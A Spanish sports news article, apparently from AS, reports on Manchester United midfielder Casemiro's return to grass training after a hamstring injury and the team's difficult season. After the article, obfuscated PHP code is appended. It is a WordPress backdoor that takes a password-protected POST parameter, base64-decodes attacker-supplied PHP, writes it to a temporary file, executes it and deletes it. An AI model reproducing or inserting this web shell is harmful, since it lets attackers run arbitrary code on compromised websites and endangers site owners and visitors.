Subidón para Casemiro

El centrocampista brasileño volvió a entrenar sobre el césped por primera vez tras su lesión el pasado 1 de noviembre. Se ha perdido 12 partidos esta temporada.

Tras maravillar en su primera temporada, situándose como uno de los mejores centrocampistas de la Premier League, Casemiro está viviendo un calvario esta temporada. Sin embargo, el brasileño está comenzando a ver la luz al final del túnel. El ex madridista está avanzando en la recuperación de la lesión sufrida en los isquiotibiales el pasado 1 de noviembre en el partido copero ante el Newcastle y ha vuelto a entrenar el césped tras más de un mes apartado de los terrenos de juego.

Importante paso adelante del centrocampista brasileño, que no tenía una lesión tan larga desde el año 2016 cuando jugaba en el Real Madrid. Casemiro solo disputó el partido ante el Newcastle con el Manchester United desde el 7 de octubre, ya que sufrió una lesión previa a la de los isquiotibiales jugando con Brasil que le tuvo dos semanas apartado de los terrenos de juego.

El brasileño se ha perdido 12 partidos desde que comenzó la temporada. En Premier League solo estuvo disponible en el 50% de los encuentros para Ten Hag. Sin embargo, todos los partidos que Casemiro estuvo disponible los arrancó como titular, una muestra de la importancia del brasileño para el técnico neerlandés. Aunque su nivel general bajó respecto a la temporada de su debut en Inglaterra, cuenta con cuatro goles y una asistencia en su casillero desde el comienzo de temporada.

Imprescindible para Ten Hag

El Manchester United anhela la vuelta de Casemiro a los terrenos de juegos. El conjunto inglés vive en una crisis constante desde el inicio de temporada tanto a nivel deportivo como extradeportivo. En el campo, los ‘diablos rojos’ están fuera de puestos europeos en Premier League y con pie y medio fuera de la Champions tras una fase de grupos caótica. Los casos de Antony y Sancho marcaron la actualidad de los de Old Trafford fuera del terreno de juego.

Ni Amrabat ni Mainoo, gran descubrimiento de Ten Hag, están consiguiendo equilibrar a un Manchester United, que ha encajado ocho goles en los últimos cuatro partidos, mientras que un jugador con la experiencia y el peso de Casemiro puede ser clave para lograr un cambio de rumbo.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}